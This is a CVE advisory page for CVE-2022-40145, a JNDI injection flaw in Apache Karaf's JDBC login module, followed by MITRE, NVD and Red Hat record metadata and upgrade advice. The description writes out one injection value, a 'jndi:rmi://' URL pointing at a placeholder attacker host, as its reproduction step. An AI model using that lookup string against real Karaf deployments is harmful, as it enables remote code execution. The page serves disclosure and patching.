This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8
History

No history.

cve-icon MITRE

Status: PUBLISHED

Assigner: apache

Published: 2022-12-21T15:23:42.847Z

Updated: 2024-08-03T12:14:39.957Z

Reserved: 2022-09-07T08:02:30.677Z

Link: CVE-2022-40145

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Modified

Published: 2022-12-21T16:15:08.930

Modified: 2024-11-21T07:20:58.460

Link: CVE-2022-40145

cve-icon Redhat

Severity : Important

Publid Date: 2022-12-21T00:00:00Z

Links: CVE-2022-40145 - Bugzilla